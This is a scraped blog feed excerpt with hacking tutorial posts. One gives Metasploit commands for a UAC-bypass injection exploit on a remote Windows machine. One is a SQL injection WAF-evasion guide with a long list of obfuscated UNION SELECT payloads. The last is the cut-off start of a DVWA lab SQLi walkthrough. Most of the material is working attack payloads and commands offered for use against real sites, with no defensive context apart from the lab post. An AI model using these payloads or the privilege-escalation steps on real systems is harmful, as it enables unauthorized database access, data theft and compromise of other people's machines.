&lt;img alt=&quot;How To Bypass UAC Protection Of Remote Windows PC in Memory Injection - FOCSoft&quot; border=&quot;0&quot; height=&quot;309&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD6PB3xYNs_6csDA6qC_PtAGvTGlsuJv9R4BkwgyT7iZAuVHbll2qLQ5RBHvW2j6Uvc8RSbCMDU88YqotGqrziQujj87ztfrMMB-MP2T7qX9SpH5f0ljlnUvkfAFVvjnLws1M4wRFUIQw/s400/1.png&quot; title=&quot;How To Bypass UAC Protection Of Remote Windows PC in Memory Injection - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot;&gt;
Now type&amp;nbsp;&lt;b&gt;use
exploit/windows/local/bypassuac_injection&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot;&gt;
msf exploit&amp;nbsp;(&lt;b&gt;bypassuac_injection&lt;/b&gt;)&amp;gt;&lt;b&gt;set session 1&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot;&gt;
msf exploit (&lt;b&gt;bypassuac_injection&lt;/b&gt;)&amp;gt;&lt;b&gt;set lhost 192.168.1.6&lt;/b&gt;&amp;nbsp;(IP of Local
Host)&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;





&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot;&gt;
msf exploit (&lt;b&gt;bypassuac_injection&lt;/b&gt;)&amp;gt;&lt;b&gt;exploit &amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img alt=&quot;How To Bypass UAC Protection Of Remote Windows PC in Memory Injection - FOCSoft&quot; border=&quot;0&quot; height=&quot;250&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivQHxfDyMjS_ZS7BWxhvcsxAHJuLT7CZe6Jnu5OVB-dRllRjI0ogTAO8q_R9VQdbEur3AtUTyFNF76Xl41lvI_dV3aONmgHDHKGIXuoTv9m8q5oe2_kKr4OEObpbHs0H-TvNB80-shk6U/s400/2.png&quot; title=&quot;How To Bypass UAC Protection Of Remote Windows PC in Memory Injection - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/5503477268385977845/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/Bypass-UAC-Protection.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/5503477268385977845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/5503477268385977845'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/Bypass-UAC-Protection.html' title='How To Bypass UAC Protection Of Remote Windows PC in Memory Injection - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD6PB3xYNs_6csDA6qC_PtAGvTGlsuJv9R4BkwgyT7iZAuVHbll2qLQ5RBHvW2j6Uvc8RSbCMDU88YqotGqrziQujj87ztfrMMB-MP2T7qX9SpH5f0ljlnUvkfAFVvjnLws1M4wRFUIQw/s72-c/1.png" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-865043623500595845</id><published>2014-03-16T06:46:00.000+05:00</published><updated>2014-03-16T06:46:20.222+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Website Hacking"/><title type='text'> SQL Injection Complex Waf Bypassing - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h3 class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot;&gt;
&lt;br /&gt;&lt;/h3&gt;
&lt;div class=&quot;post-header&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://securityundefined.com/content/uploads/waf.jpg&quot;&gt;&lt;img alt=&quot; SQL Injection Complex Waf Bypassing&quot; border=&quot;0&quot; height=&quot;157&quot; src=&quot;http://securityundefined.com/content/uploads/waf.jpg&quot; title=&quot; SQL Injection Complex Waf Bypassing&quot; width=&quot;280&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;br /&gt;&lt;/h2&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: orange;&quot;&gt;
Hello Friends&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Note:&lt;/span&gt;&lt;/b&gt; Before starting this 
topic, I want to clarify that I won&#39;t be covering on basic SQL Injection
 attacks. This article is meant for WAF /Filter bypassing during 
Injection.&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;span style=&quot;color: blue;&quot;&gt;What is WAF? &lt;/span&gt;&lt;/h3&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;WAF stands for 
Web Application Firewall. It is widely used nowadays to detect and 
defend SQL Injections and Cross Site Scripting (XSS) attacks.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;How does it Work?&lt;/b&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;When WAF detects any malicious input from end user, It gives&amp;nbsp; 403 Forbidden, 406 Not Acceptable or any Kind of Custom errors&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu2q5pD9GTvIiwfWg0MJyf9cNThbhmvcwcMmANSh9ub1HXF3GdiF1yZr3oNzgmAoknMDI6vJO-9EuZiq1raW66JzkgJ7FJCDF-0EP5fVPRFl09jObY4E8-9RsU3VQHFdUf8F6VF3FfTyBf/s1600/1.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot; SQL Injection Complex Waf Bypassing&quot; border=&quot;0&quot; height=&quot;75&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu2q5pD9GTvIiwfWg0MJyf9cNThbhmvcwcMmANSh9ub1HXF3GdiF1yZr3oNzgmAoknMDI6vJO-9EuZiq1raW66JzkgJ7FJCDF-0EP5fVPRFl09jObY4E8-9RsU3VQHFdUf8F6VF3FfTyBf/s280/1.png&quot; title=&quot; SQL Injection Complex Waf Bypassing&quot; width=&quot;280&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h3&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;What to do next?&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;So, what to do next? we cant do our further injection right?&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Well its time to use various techniques to bypass thing. Some of these techniques are mentioned below:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;h4&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;# Case Changing:&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Most of the Waf&#39;s only filter lowercase or higher-case keywords. We can easily evade that kind of wafs by using alternate case.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;if &lt;b&gt;&lt;i&gt;union select&lt;/i&gt;&lt;/b&gt; is forbidden , we can always try &lt;b&gt;&lt;i&gt;UNION SELECT&lt;/i&gt;&lt;/b&gt; instead. And if both does not work, We can try our luck with using mixture of both. like &lt;i&gt;&lt;b&gt;UniOn seLeCt&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;h4&gt;
&lt;span style=&quot;color: blue;&quot;&gt;# Using Comments&lt;/span&gt;&lt;/h4&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;SQL comments really help us in many cases. They play their important role in killing some Waf&#39;s Restrictions. e.g&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; // , -- , --+ , #, -- -&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;h4&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;# Inline Comments &lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Some WAF’s filter keywords like /union\sselect/ig We can bypass these filters by using inline comments most of the time&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;b&gt;http://localhost/waf.php?id=1 /*!union*/&amp;nbsp; /*!select*/ 1,2,3--&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaRlxTcOQFxrN3JTcnwEC8tLEqVyRYBsHcTiXG24T3euz_77wEtH6JSQ12n-1tIM1qObk_wnWSoJfe5JEZ55Dv_gDFULA4s9ShTYdRifNnjF90zmbp4fhdJLkhew10h7ab13eu8tl3sYhyphenhyphen/s1600/2.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot; SQL Injection Complex Waf Bypassing&quot; border=&quot;0&quot; height=&quot;93&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaRlxTcOQFxrN3JTcnwEC8tLEqVyRYBsHcTiXG24T3euz_77wEtH6JSQ12n-1tIM1qObk_wnWSoJfe5JEZ55Dv_gDFULA4s9ShTYdRifNnjF90zmbp4fhdJLkhew10h7ab13eu8tl3sYhyphenhyphen/s280/2.png&quot; title=&quot; SQL Injection Complex Waf Bypassing&quot; width=&quot;280&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Tip:&lt;/span&gt;&lt;/b&gt; Read SQLi Errors carefully. Sometimes they left error from which we can have idea that how waf is working on this site.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Anyways, We were 
talking about Filtered Keywords. So it does not mean&amp;nbsp; that waf is only 
filtering union select. It may be filtering all SQL keywords like 
table_name, column_name etc&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;So might need to apply these inline comments on those keywords as well. Example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;http://localhost/waf.php?id=1
 /*!union*/ /*!select*/ 1,2,/*!table_name*/,4,5 /*!from*/ 
/*!information_schema.tables*/ /*!where*/ /*!table_schema*/=database()--&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;h4&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;# Double use of Keywords &lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;br /&gt;
Sometimes WAF removes whole keyword from the query and execute it and throw errors&lt;br /&gt;
In such cases, we can use keywords in this way&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;http://localhost/waf.php?id=1 UNunionION SELselectECT 1,2,3,4,5,6--&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Anyways It totally depends upon the scenario. Im just giving a common Idea. Rest is upon you that how you use it.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;h4&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;# Using Different types of Whitespaces&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Sometime Waf may 
be filtering the whitespace we are using between keywords. We mostly use
 Spaces But space is not the only whitespace we can use in SQL 
injection. We have some other options as well&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&amp;nbsp; for example + .&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;%20 is use for space, but we can try using one of these whitespaces . some examples are &lt;i&gt;%09&amp;nbsp; %0A&amp;nbsp; %0B %0C %0D %A0&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;inurl:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&amp;nbsp;union%0Bselect%0B1,2,3--&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;h4&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;# Encoding &lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;We can always try our luck with URL encode thing to bypass WAF. For example we can use&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;i&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;union select 1,/*!table_name*/,3 from information_schema.tables where table_schema=database()&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&amp;nbsp;as&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&amp;nbsp;&lt;i&gt;union%20select%201,%2f%2a%21table_name%2a%2f,3%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29 &lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
but sometime waf filter also filter % itself. So we have to use double URL encoding in that case&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&amp;nbsp;union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 
from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529&lt;/blockquote&gt;
&lt;br /&gt;
&lt;h4&gt;
&lt;b&gt;&lt;span style=&quot;color: blue;&quot;&gt;# Unexpected Input &lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;br /&gt;
This scenario is very rare that we have to use buffer overflow or give unexpected query /request&amp;nbsp; to trick WAF filters.&lt;br /&gt;
for example:&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;br /&gt;
http://localhost/waf.php?id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) union select 1,2,3,4,5--&lt;/blockquote&gt;
&amp;nbsp;This thing only worked once for me. But knowledge is Power, may be you 
face any scenario that can be bypassed by using buffer overflow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h4&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;# use all above mentioned techniques together&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;br /&gt;
ah.. tried all those things but still its showing NOT ACCEPTABLE or 
FORBIDDEN. well its time to use all these above mentioned techniques 
combined.&lt;br /&gt;
For example: you can use alternative cases with inline comments or obfuscation.&lt;br /&gt;
&lt;br /&gt;
&lt;h4&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;#Some Common Union Select Solutions:&amp;nbsp; &lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&amp;nbsp;&lt;i&gt;%55nion(%53elect 1,2,3)-- -&lt;br /&gt;+union+distinct+select+&lt;br /&gt;+union+distinctROW+select+&lt;br /&gt;/**//*!12345UNION SELECT*//**/&lt;br /&gt;/**//*!50000UNION SELECT*//**/&lt;br /&gt;/**/UNION/**//*!50000SELECT*//**/&lt;br /&gt;/*!50000UniON SeLeCt*/&lt;br /&gt;union /*!50000%53elect*/&lt;br /&gt;+#uNiOn+#sEleCt&lt;br /&gt;+#1q%0AuNiOn all#qa%0A#%0AsEleCt&lt;br /&gt;/*!%55NiOn*/ /*!%53eLEct*/&lt;br /&gt;/*!u%6eion*/ /*!se%6cect*/&lt;br /&gt;+un/**/ion+se/**/lect&lt;br /&gt;uni%0bon+se%0blect&lt;br /&gt;%2f**%2funion%2f**%2fselect&lt;br /&gt;union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A&lt;br /&gt;REVERSE(noinu)+REVERSE(tceles)&lt;br /&gt;/*--*/union/*--*/select/*--*/&lt;br /&gt;union (/*!/**/ SeleCT */ 1,2,3)&lt;br /&gt;/*!union*/+/*!select*/&lt;br /&gt;union+/*!select*/&lt;br /&gt;/**/union/**/select/**/&lt;br /&gt;/**/uNIon/**/sEleCt/**/&lt;br /&gt;/**//*!union*//**//*!select*//**/&lt;br /&gt;/*!uNIOn*/ /*!SelECt*/&lt;br /&gt;+union+distinct+select+&lt;br /&gt;+union+distinctROW+select+&lt;br /&gt;uNiOn aLl sElEcT&lt;/i&gt;&lt;/blockquote&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;
&amp;nbsp;I hope you have enjoyed this article. Please give us your feedback. So 
that we maybe able to make things more clear for you next time.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/865043623500595845/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/WafBypassing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/865043623500595845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/865043623500595845'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/WafBypassing.html' title=' SQL Injection Complex Waf Bypassing - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu2q5pD9GTvIiwfWg0MJyf9cNThbhmvcwcMmANSh9ub1HXF3GdiF1yZr3oNzgmAoknMDI6vJO-9EuZiq1raW66JzkgJ7FJCDF-0EP5fVPRFl09jObY4E8-9RsU3VQHFdUf8F6VF3FfTyBf/s72-c/1.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-343005356574657038</id><published>2014-03-16T06:40:00.000+05:00</published><updated>2014-03-16T06:40:55.094+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Website Hacking"/><title type='text'> SQL Injection With HTML Tags - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h3 class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot;&gt;
&lt;br /&gt;&lt;/h3&gt;
&lt;div class=&quot;post-header&quot;&gt;

&lt;/div&gt;
&amp;nbsp;.&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: orange;&quot;&gt;
Hello Friends&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
Today i will guide you on how to perform SQL Injection with html tags,&lt;br /&gt;
In Other words, we put html tags together with our sqli query to be executed.&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFjVR_wfHFpIzi9UC_Zb05wHFpmepMqc2Hnh35XB2HvQ1ZCIfreDs3uqQ4xwzS-V2aRDhO_mtTODxJx_Xt32fvqlOlQIsj8sjbEks-Kx1GyWfdkUKscrsrLk3qyfz2uo3AdtbXy8xsIy4n/s1600/Output+file.png&quot;&gt;&lt;img alt=&quot; SQL Injection with HTML Tags &quot; border=&quot;0&quot; height=&quot;142&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFjVR_wfHFpIzi9UC_Zb05wHFpmepMqc2Hnh35XB2HvQ1ZCIfreDs3uqQ4xwzS-V2aRDhO_mtTODxJx_Xt32fvqlOlQIsj8sjbEks-Kx1GyWfdkUKscrsrLk3qyfz2uo3AdtbXy8xsIy4n/s280/Output+file.png&quot; title=&quot; SQL Injection with HTML Tags &quot; width=&quot;280&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
This you need first Before starting&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;A SQLI Vulnerable site.&lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; (in my case im using &lt;a href=&quot;http://focsoft.blogspot.com/2014/03/PenetrationTestingLAB-WithDVWA.html&quot; target=&quot;_blank&quot;&gt;DVWA PenLab&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;http://focsoft.blogspot.com/2014/03/PenetrationTestingLAB-WithDVWA.html&quot; target=&quot;_blank&quot;&gt;DVWA PenLab&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Bare Hands :)&lt;/li&gt;
&lt;/ul&gt;
&lt;b&gt;&lt;br /&gt;Step 1,&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to mozilla ang type 127.0.0.1&lt;br /&gt;
Sign in to DVWA with default Login details&lt;br /&gt;
&quot; admin:password&quot;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2&lt;/b&gt;&lt;br /&gt;
Step go to DVWA Security, Change it To Low.&lt;br /&gt;
save it, Then Go to SQL Injection&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3&lt;/b&gt;&lt;br /&gt;
Find how many columns &lt;br /&gt;
so yeah, The column numbers are 2&lt;br /&gt;
so lets try union select query to get the columns&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires&#39; UNION SELECT 1,2--+&amp;amp;Submit=Submit#&lt;/span&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
